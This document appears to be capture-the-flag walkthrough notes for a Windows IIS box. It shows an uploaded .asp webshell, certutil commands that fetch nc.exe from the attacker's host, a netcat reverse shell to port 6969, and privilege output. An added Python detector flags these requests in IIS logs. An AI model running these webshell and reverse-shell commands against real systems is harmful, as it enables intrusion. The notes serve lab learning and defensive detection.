8 :80

http://10.10.10.116/
IIS 10.0 landing page

$ gobuster dir -u http://10.10.10.116 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x aspx,asp,html,txt
===============================================================
/upload               (Status: 301) [Size: 150] [--> http://10.10.10.116/upload/]

http://10.10.10.116/upload/
# shows kashz.txt that we uploaded.

# .aspx => FAIL
|  (Warning: Do not create a MIME map for content that users should not download, such as .ASPX pages or .config files.)

# the usual .asp shells are not working
Using https://github.com/tennc/webshell/blob/master/asp/webshell.asp
> works
# it's x64, using nc to get a stable shell
http://10.10.10.116/upload/webshell.asp?cmd=certutil.exe -urlcache -f http://10.10.16.7/nc.exe C:\Users\Public\nc.exe
http://10.10.10.116/upload/webshell.asp?cmd=C:\Users\Public\nc.exe -e cmd.exe 10.10.16.7 6969
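Added detection example, not part of the original notes: the two webshell requests above would be recorded in the IIS W3C log, so this script flags requests that execute a server-side script under a directory users can write to (assumed here to be /upload/) whose query string names a download cradle or a shell binary. The log excerpt is constructed to mirror those requests; the field layout follows the default IIS 10 `#Fields` line.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not captured from the box). The #Fields line
# is the IIS 10 default, and the parser takes the column names from it.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2019-01-01 10:00:00 10.10.10.116 GET /upload/kashz.txt - 80 - 10.10.16.7 Mozilla/5.0 - 200 0 0 12
2019-01-01 10:00:05 10.10.10.116 GET /upload/webshell.asp cmd=certutil.exe%20-urlcache%20-f%20http://10.10.16.7/nc.exe%20C:\\Users\\Public\\nc.exe 80 - 10.10.16.7 Mozilla/5.0 - 200 0 0 340
2019-01-01 10:00:09 10.10.10.116 GET /upload/webshell.asp cmd=C:\\Users\\Public\\nc.exe%20-e%20cmd.exe%2010.10.16.7%206969 80 - 10.10.16.7 Mozilla/5.0 - 200 0 0 50
2019-01-01 10:01:00 10.10.10.116 GET /index.html - 80 - 10.10.14.2 Mozilla/5.0 - 200 0 0 5
"""

# Extensions IIS hands to a script engine; a user-writable folder should serve none of them.
SCRIPT_EXT = re.compile(r"\.(asp|aspx|ashx|asmx)$", re.I)
# Tokens that indicate a download cradle or an interactive shell being driven through a script.
SUSPICIOUS = re.compile(r"(certutil|-urlcache|\bnc\.exe|\bcmd\.exe|powershell)", re.I)


def parse_w3c(text):
    """Yield one dict per log record, keyed by the names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):  # W3C fields are space-delimited and never contain spaces
                yield dict(zip(fields, values))


def find_webshell_requests(text, writable_dir="/upload/"):
    """Return (client_ip, uri_stem, decoded_query) for every request that runs a
    server-side script under writable_dir with a suspicious query string."""
    hits = []
    for rec in parse_w3c(text):
        stem = rec["cs-uri-stem"]
        if not stem.lower().startswith(writable_dir) or not SCRIPT_EXT.search(stem):
            continue
        raw = rec["cs-uri-query"]
        query = unquote_plus(raw) if raw != "-" else ""  # IIS logs "-" for an empty query
        if SUSPICIOUS.search(query):
            hits.append((rec["c-ip"], stem, query))
    return hits


if __name__ == "__main__":
    for ip, stem, query in find_webshell_requests(SAMPLE_LOG):
        print(f"{ip} -> {stem} ? {query}")
```

The same handler or MIME-map restriction that already refuses .aspx in this directory, applied to .asp as well, removes the condition these log lines detect.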


$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.116] 49676
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute

C:\Windows\SysWOW64\inetsrv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled

C:\Windows\SysWOW64\inetsrv>systeminfo
Host Name:                 CONCEAL
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.15063 N/A Build 15063
System Type:               x64-based PC
Hotfix(s):                 N/A
